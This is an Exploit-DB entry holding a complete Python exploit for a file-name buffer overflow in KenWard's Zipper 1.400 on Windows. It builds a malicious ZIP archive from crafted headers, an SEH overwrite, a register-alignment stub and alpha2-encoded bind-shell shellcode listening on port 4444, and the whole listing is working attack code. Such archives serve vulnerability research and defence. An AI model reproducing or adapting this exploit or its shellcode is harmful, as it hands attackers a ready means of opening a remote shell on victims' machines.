KenWard's Zipper 1.400 - Local Buffer Overflow (2)

EDB-ID:

11872

CVE:


Author:

sinn3r

Type:

local

Platform:

Windows

Published:

2010-03-25

#!/usr/bin/python

## KenWard's Zipper v1.400 File Name Buffer Overflow
## Coded by sinn3r  (x90.sinner{at}gmail{d0t}com)
## Tested on: Windows XP SP3 ENG
## Reference: http://www.exploit-db.com/exploits/11834
## Big thanks to mr_me, and corelanc0d3r.
## greetz to all the friends at Corelan Scurity Team & Exploit-DB... coolest people ever!
##
## Description:
## This exploit takes advantage of the fact too many characters get mangled, as a result
## I was able to get a shell in a more straight forward way.  Very interesting exercise.
## Mr_me and tecR0c figured out this trick, of course.  But I was given the honor to share it.

## Script provided 'as is', without any warranty.
## Use for educational purposes only.  Do not use this code to do anything illegal.

## Zip file format based on:
## http://en.wikipedia.org/wiki/ZIP_(file_format)
local_file_header = (
"\x50\x4B\x03\x04" 	#Local file header signature
"\x00\x02"		#Version needed to extract
"\x00\x08"		#General purpose bit flag
"\x00\xDA"		#Compression method
"\xA2\x48"		#File last modification time
"\x3B\xF6"		#File last modification date
"\x66\x18\x0D\x4E"	#CRC-32
"\xEF\x0F\x00\x00"	#Compressed size (payload size)
"\x14\x00\x00\x00"	#Uncompressed size
"\xe4\x4f"		#File name length
"\x04\x00"		#Extra field length
#"\x73\x65\x63\x72\x65\x74\x73"	#File name (n) ASCII "secrets"
#"\x42\x42\x42\x42"	#Extra field (m)
);

central_directory_file_header = (
"\x50\x4b\x01\x02"	#Central directory file header signature
"\x14\x00"		#Version made by
"\x14\x00"		#Version needed to extract
"\x00\x08"		#General purpose bit flag
"\x00\xDA"		#Compression method
"\xA2\x48"		#File last modification time
"\x3B\xF6"		#File last modification date
"\x66\x18\x0D\x4E"	#CRC-32
"\xE4\x0F\x00\x00"	#Compressed size (payload size)
"\x14\x00\x00\x00"	#Uncompressed size
"\xe4\x0f"		#File name length (n)
"\x04\x00"		#Extra field length (m)
"\x04\x00"		#File comment length
"\x00\x01"		#Disk number where file starts
"\x00\x00"		#Internal file attributes
"\x20\x00\x00\x00"	#External file attributes
"\x00\x00\x00\x00"	#Relative offset of local file header
#"\x73\x65\x63\x72\x65\x74\x73"	#File name (n) ASCII "secrets"
#"\x42\x42\x42\x42"	#Extra field (m)
#"\x43\x43\x43\x43"	#File comment (k)
);

end_of_central_directory_record = (
"\x50\x4B\x05\x06"	#End of central directory signature
"\x00\x00"		#Number of this disk
"\x00\x00"		#Disk where central directory starts
"\x01\x00"		#Number of central directory records on this disk
"\x01\x00"		#Total number of central directory records
"\x12\x10\x00\x00"	#Size of central directory (central directory size + payload)
"\x02\x10\x00\x00"	#Offset of start of central directory, relative to start of archive (lfh + payload)
"\x00\x00"		#Zip file comment length (n)
);


## Align EAX for the base address of the alpha2 encoded bindshell
alignEAX = (
"\x05\x10\x7E\x10\x7E"	#ADD EAX, 0x7E107E10
"\x05\x09\x75\x01\x7E"	#ADD EAX, 0x7E017509
"\x05\x02\x03\x01\x04"	#ADD EAX, 0x04010302
"\x72\x07"+		#JB jump over the bytes we can't overwrite
"\x41"*12		#NOPs
);

## windows/shell_bind_tcp lport=4444 exitfunc=seh
## alpha2 eax --uppercase   744 bytes
shellcode = ("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLZHMYEP5PS03PK"
"9ZE6QN2CTLK0RVPLKPR4LLKQBTTLKSBVH4ONWQZVFFQKOFQO0NLGL3QSL4BVLQ0YQXO4MUQIWKRJPF2QGLKPRB0"
"LKPBGLEQ8PLK70RXMUO0BTQZEQHPPPLK78TXLK687PS1XSM37LPILKWDLKUQ8V6QKO6QYPNL9Q8OTMEQ9WFXKPT"
"5ZT33SMJX7KCM14CEZB1HLKPXWTUQN3SVLKTLPKLKV85LEQXSLK34LKS1HPK9W47TQ4QK1KSQQI0Z0QKOM0PXQO"
"QJLKTRJKK61MSXVS02EP5PCXBW3CFRQOF4SXPLT77VDGKO9EX8LPS1UPS0WYO4F4PP3X7YMP2KS0KOHUV00P0P6"
"0QPV01PPPRHJJTOIOKPKON5MYO7FQYK0SSXS2S0TQQLMYKVSZB0PVPW3XO2YK7GCWKO8UPSPWE8X7KYWHKOKOHU"
"QCV3PWSX2TJLGKKQKON5V7MYHG58BU2N0M3QKON52HRCBM54UPMYKS0W67676QL62JTRPYPVKRKMSVO774WTWLU"
"QUQLM0DGTB0O65PPD0TV0PV0V0VQVPVPNPV1FQC66SXT9XLWOLFKOYEK9M0PNV6QVKOFPCXUXK75MSPKON5OKKN"
"TNP2ZJBHY6LUOMMMKON5WLUV3L5ZK0KKKPRUC5OKW74S2R2ORJ5PPSKO8UUZA")

## 4064+4 bytes
## Pointer to next SEH record: 1022 bytes
## SE handler                : 1026 bytes
payload = (
"\x41"*(1017-len(alignEAX)-len(shellcode))+	#Padding
alignEAX+					#Align EAX for the bindshell
shellcode+					#Bindshell lport 4444
"\x82\x85\x81\x98\x98"				#This will get mangled and become "\xE9\xE0\xFC\xFF\xFF"
"\x73\x97\x42\x42"				#JNB 0x97 = JNB 0xF9 = Same as EB 0xFB = Rewind 5 bytes
"\x7E\x27\x41\x00"+				#POP POP RET = 0x0041277E
"\x44"*3034+					#Padding
".bin"						#Fake name
);

## Create the ZIP structure with our payload
zip = (
local_file_header +
payload +
central_directory_file_header +
payload +
end_of_central_directory_record
);

f = open("sploit.zip", "w")
f.write(zip)
f.close()

print "[*] Local file header size = 0x%x" %len(local_file_header)
print "[*] Central directory file header size = 0x%x" %len(central_directory_file_header)
print "[*] End of central directory record size = 0x%x" %len(end_of_central_directory_record)
print "[*] Payload size = %s bytes" %len(payload)
print "[*] sploit.zip created.  Open it with KenWard's Zipper."